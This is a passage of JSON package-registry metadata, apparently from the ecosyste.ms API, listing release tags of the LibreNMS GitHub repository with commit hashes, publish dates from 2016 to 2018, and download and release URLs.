hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.47/manifests"},{"name":"1.46","sha":"bd5e692dc778ff7e7e05e5765baa2ad584154589","kind":"commit","published_at":"2018-12-02T20:48:18.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.46","html_url":"https://github.com/librenms/librenms/releases/tag/1.46","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.46","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.46","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.46/manifests"},{"name":"1.45","sha":"4ce95e0bda22efa79fed403720493c98ceb85979","kind":"commit","published_at":"2018-10-28T22:46:53.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.45","html_url":"https://github.com/librenms/librenms/releases/tag/1.45","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.45","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.45","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.45/manifests"},{"name":"1.44","sha":"f049593c7b1723d050a0124a9e877cb97ca0ca6d","kind":"commit","published_at":"2018-10-17T10:33:28.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.44","html_url":"https://github.com/librenms/librenms/releases/tag/1.44","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.44","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.44","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.44/manifests"},{"name":"1.43","sha":"4fb9d5ba3585148dcce78783efc3262c62983617","kind":"commit","published_at":"2018-08-31T08:37:38.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.43","html_url":"https://github.com/librenms/librenms/releases/tag/1.43","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.43","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.43","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.43/manifests"},{"name":"1.42.01","sha":"703e90fbc21de2eb1d9f1445b202346d47b747e3","kind":"commit","published_at":"2018-08-04T20:07:12.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.42.01","html_url":"https://github.com/librenms/librenms/releases/tag/1.42.01","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.42.01","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.42.01","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.42.01/manifests"},{"name":"1.42","sha":"19c2eadc3f54077647ffa4ff28cc78ab4bf45c8a","kind":"commit","published_at":"2018-08-02T20:38:47.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.42","html_url":"https://github.com/librenms/librenms/releases/tag/1.42","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.42","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.42","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.42/manifests"},{"name":"1.41","sha":"1e410ca11adc5dfd5b406276ab5ebf80dcb5f928","kind":"commit","published_at":"2018-06-30T21:37:37.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.41","html_url":"https://github.com/librenms/librenms/releases/tag/1.41","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.41","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.41","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.41/manifests"},{"name":"1.40","sha":"e45aeff8713b39f2cf4a0998bcffb1e0abe5f1e9","kind":"commit","published_at":"2018-05-30T19:34:50.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.40","html_url":"https://github.com/librenms/librenms/releases/tag/1.40","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.40","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.40","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.40/manifests"},{"name":"1.39","sha":"386fea0321a86b197d302629a04d20d480828d6d","kind":"commit","published_at":"2018-04-29T20:42:40.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.39","html_url":"https://github.com/librenms/librenms/releases/tag/1.39","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.39","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.39","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.39/manifests"},{"name":"1.38-full","sha":"758db67a7381f1f3450273d602dca4dfb99006f3","kind":"commit","published_at":"2018-04-19T20:54:39.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.38-full","html_url":"https://github.com/librenms/librenms/releases/tag/1.38-full","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.38-full","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.38-full","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.38-full/manifests"},{"name":"1.38","sha":"b39cd1fa047fbc7b72a18a1f20c1489db867efca","kind":"commit","published_at":"2018-04-01T19:26:10.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.38","html_url":"https://github.com/librenms/librenms/releases/tag/1.38","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.38","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.38","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.38/manifests"},{"name":"1.37","sha":"ff02fced6e2bfa78776c5458d73079800916c58a","kind":"commit","published_at":"2018-02-26T21:43:41.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.37","html_url":"https://github.com/librenms/librenms/releases/tag/1.37","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.37","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.37","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.37/manifests"},{"name":"1.36.01","sha":"ff92960c64dccad16aee7dcd9af4a49362176dfa","kind":"commit","published_at":"2018-01-31T13:54:16.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.36.01","html_url":"https://github.com/librenms/librenms/releases/tag/1.36.01","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.36.01","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.36.01","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.36.01/manifests"},{"name":"1.36","sha":"92e1048940638a738c8c12aa27337871bfc3a06f","kind":"commit","published_at":"2018-01-27T12:57:40.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.36","html_url":"https://github.com/librenms/librenms/releases/tag/1.36","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.36","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.36","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.36/manifests"},{"name":"1.35","sha":"6d4ef1f50a619fc52935ea48ed5c844e7a4ac041","kind":"commit","published_at":"2017-12-20T17:04:24.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.35","html_url":"https://github.com/librenms/librenms/releases/tag/1.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.35/manifests"},{"name":"1.34","sha":"2b11c84bb9a6ca6624b375131097c68bc693737a","kind":"commit","published_at":"2017-11-25T10:23:13.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.34","html_url":"https://github.com/librenms/librenms/releases/tag/1.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.34/manifests"},{"name":"1.33.01","sha":"ad5795c5bd6cbf3567caba02d1f218bc43f4568e","kind":"commit","published_at":"2017-11-01T17:55:06.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.33.01","html_url":"https://github.com/librenms/librenms/releases/tag/1.33.01","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.33.01","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.33.01","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.33.01/manifests"},{"name":"1.33","sha":"e55c68de3bfba3b94c01e7dff9431a7a009d7c20","kind":"commit","published_at":"2017-10-29T21:39:24.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.33","html_url":"https://github.com/librenms/librenms/releases/tag/1.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.33/manifests"},{"name":"1.32.01","sha":"cbc2757cea54268de9f54fc64fd59bd6bacd623a","kind":"commit","published_at":"2017-10-18T13:52:18.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.32.01","html_url":"https://github.com/librenms/librenms/releases/tag/1.32.01","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.32.01","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.32.01","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.32.01/manifests"},{"name":"1.32","sha":"9009633392f219e01173bd26f1c01b7cf55e6b34","kind":"commit","published_at":"2017-10-01T18:58:39.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.32","html_url":"https://github.com/librenms/librenms/releases/tag/1.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.32/manifests"},{"name":"1.31.03","sha":"4683736fcf17955f9eb519a61ab09a262698ce5d","kind":"commit","published_at":"2017-08-29T18:53:05.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.31.03","html_url":"https://github.com/librenms/librenms/releases/tag/1.31.03","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.31.03","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.31.03","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.31.03/manifests"},{"name":"1.31.02","sha":"963ad16bddcb2a21ca8a880f337a054e5d37d9d3","kind":"commit","published_at":"2017-08-29T15:05:30.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.31.02","html_url":"https://github.com/librenms/librenms/releases/tag/1.31.02","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.31.02","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.31.02","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.31.02/manifests"},{"name":"1.31.01","sha":"b5d24a533a0e2d98db6489054c6d649f47ea973c","kind":"commit","published_at":"2017-08-28T19:24:43.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.31.01","html_url":"https://github.com/librenms/librenms/releases/tag/1.31.01","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.31.01","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.31.01","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.31.01/manifests"},{"name":"1.31","sha":"267351f286f3217a55edbca5ec2d35a14b2c97a9","kind":"commit","published_at":"2017-08-27T14:08:34.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.31","html_url":"https://github.com/librenms/librenms/releases/tag/1.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.31/manifests"},{"name":"1.30.01","sha":"7887b2e1c7158204ac69ca43beafce66e4d3a3b4","kind":"commit","published_at":"2017-08-18T20:49:31.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.30.01","html_url":"https://github.com/librenms/librenms/releases/tag/1.30.01","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.30.01","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.30.01","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.30.01/manifests"},{"name":"1.30","sha":"2bf3fd89052d5f5d4d79ac3bd69f8dc39da00e6d","kind":"commit","published_at":"2017-07-30T08:31:34.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.30","html_url":"https://github.com/librenms/librenms/releases/tag/1.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.30/manifests"},{"name":"1.29","sha":"967fb8009235a1b17808aec86ab4a90c17aeb66b","kind":"commit","published_at":"2017-06-25T20:25:26.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.29","html_url":"https://github.com/librenms/librenms/releases/tag/1.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.29/manifests"},{"name":"1.28","sha":"6a79d4495f1a5d91d476021b7fb3ab58889e6f80","kind":"commit","published_at":"2017-05-28T21:54:20.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.28","html_url":"https://github.com/librenms/librenms/releases/tag/1.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.28/manifests"},{"name":"1.27","sha":"72a0d8202aa15e4474ae95a904b076c6e5f151e7","kind":"commit","published_at":"2017-04-30T16:32:39.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.27","html_url":"https://github.com/librenms/librenms/releases/tag/1.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.27/manifests"},{"name":"1.26","sha":"737865c94f9ac5f5874c71db7cbe91823601570d","kind":"commit","published_at":"2017-03-26T12:06:00.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.26","html_url":"https://github.com/librenms/librenms/releases/tag/1.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.26/manifests"},{"name":"1.25","sha":"3f5bf56b557668659e32909204da3a42c6adac09","kind":"commit","published_at":"2017-02-26T22:14:06.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.25","html_url":"https://github.com/librenms/librenms/releases/tag/1.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.25/manifests"},{"name":"1.24","sha":"8aa2480c05e20f2bd0b975925cef34e5d0a8038f","kind":"commit","published_at":"2017-01-29T06:54:29.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.24","html_url":"https://github.com/librenms/librenms/releases/tag/1.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.24/manifests"},{"name":"1.23","sha":"c37eef3a0843d9217d01697fdbb90e7ef38911a0","kind":"commit","published_at":"2017-01-01T15:50:41.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.23","html_url":"https://github.com/librenms/librenms/releases/tag/1.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.23/manifests"},{"name":"1.22.01","sha":"eedd8e3c9a2ea57a34e14f3f5c099087b94dba3d","kind":"commit","published_at":"2016-11-30T23:16:51.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.22.01","html_url":"https://github.com/librenms/librenms/releases/tag/1.22.01","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.22.01","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.22.01","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.22.01/manifests"},{"name":"1.22","sha":"916c8cbc8b94d307028cb8de20543cdb7d3f7045","kind":"commit","published_at":"2016-11-27T21:05:09.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.22","html_url":"https://github.com/librenms/librenms/releases/tag/1.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.22/manifests"},{"name":"1.21","sha":"fe59396a092426a54871c73df989da52cbce9f31","kind":"commit","published_at":"2016-10-30T19:25:04.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.21","html_url":"https://github.com/librenms/librenms/releases/tag/1.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.21/manifests"},{"name":"201609.01","sha":"92ee374bb8e67602f60ae025e937de7e1bb3da68","kind":"commit","published_at":"2016-10-17T17:11:40.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201609.01","html_url":"https://github.com/librenms/librenms/releases/tag/201609.01","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201609.01","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201609.01","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201609.01/manifests"},{"name":"1.20.1","sha":"92ee374bb8e67602f60ae025e937de7e1bb3da68","kind":"commit","published_at":"2016-10-17T17:11:40.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.20.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.20.1/manifests"},{"name":"201609","sha":"0856c5675e0b8ecf17b1fcc99df0d685fc3d92a9","kind":"commit","published_at":"2016-10-02T12:05:20.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201609","html_url":"https://github.com/librenms/librenms/releases/tag/201609","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201609","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201609","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201609/manifests"},{"name":"1.20","sha":"0856c5675e0b8ecf17b1fcc99df0d685fc3d92a9","kind":"commit","published_at":"2016-10-02T12:05:20.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.20","html_url":"https://github.com/librenms/librenms/releases/tag/1.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.20/manifests"},{"name":"20160828","sha":"60332cd919ec59cb3413030692b50b3bda1657b4","kind":"commit","published_at":"2016-08-28T13:56:02.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/20160828","html_url":"https://github.com/librenms/librenms/releases/tag/20160828","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@20160828","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/20160828","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/20160828/manifests"},{"name":"1.19","sha":"60332cd919ec59cb3413030692b50b3bda1657b4","kind":"commit","published_at":"2016-08-28T13:56:02.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.19","html_url":"https://github.com/librenms/librenms/releases/tag/1.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.19/manifests"},{"name":"201608","sha":"598c6de6c68aa93d801a182723cc6ccf59c63ffb","kind":"commit","published_at":"2016-07-31T15:07:36.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201608","html_url":"https://github.com/librenms/librenms/releases/tag/201608","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201608","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201608","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201608/manifests"},{"name":"201607","sha":"a2d932e4308d9b591ecb7e9c6a7672ae1322bdbc","kind":"commit","published_at":"2016-07-03T17:30:26.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201607","html_url":"https://github.com/librenms/librenms/releases/tag/201607","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201607","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201607","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201607/manifests"},{"name":"201606","sha":"5514ffb9ef7f8747a545defbdb4af485c3873e70","kind":"commit","published_at":"2016-06-12T17:57:22.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201606","html_url":"https://github.com/librenms/librenms/releases/tag/201606","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201606","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201606","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201606/manifests"},{"name":"201605","sha":"6aee5a4bf5cb04998e8ad53467ced737a9374671","kind":"commit","published_at":"2016-05-01T14:55:48.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201605","html_url":"https://github.com/librenms/librenms/releases/tag/201605","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201605","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201605","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201605/manifests"},{"name":"201604","sha":"fec12e170107b3864f0736beadf7850de0e07e5f","kind":"commit","published_at":"2016-04-10T13:05:36.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201604","html_url":"https://github.com/librenms/librenms/releases/tag/201604","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201604","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201604","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201604/manifests"},{"name":"201603","sha":"03d8345b472cb4408434a8dcb7834ff05ba83689","kind":"commit","published_at":"2016-03-06T20:59:57.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201603","html_url":"https://github.com/librenms/librenms/releases/tag/201603","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201603","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201603","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201603/manifests"},{"name":"201602","sha":"f170a1ab77f5d642ea8ce72fb53a9459176304f7","kind":"commit","published_at":"2016-02-07T15:59:02.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201602","html_url":"https://github.com/librenms/librenms/releases/tag/201602","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201602","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201602","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201602/manifests"},{"name":"201601","sha":"c5e25f1044e35fa75e6f5f776607507ae81e9341","kind":"commit","published_at":"2016-01-05T12:03:49.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201601","html_url":"https://github.com/librenms/librenms/releases/tag/201601","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201601","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201601","manifests_url":"https://repos.ecosyst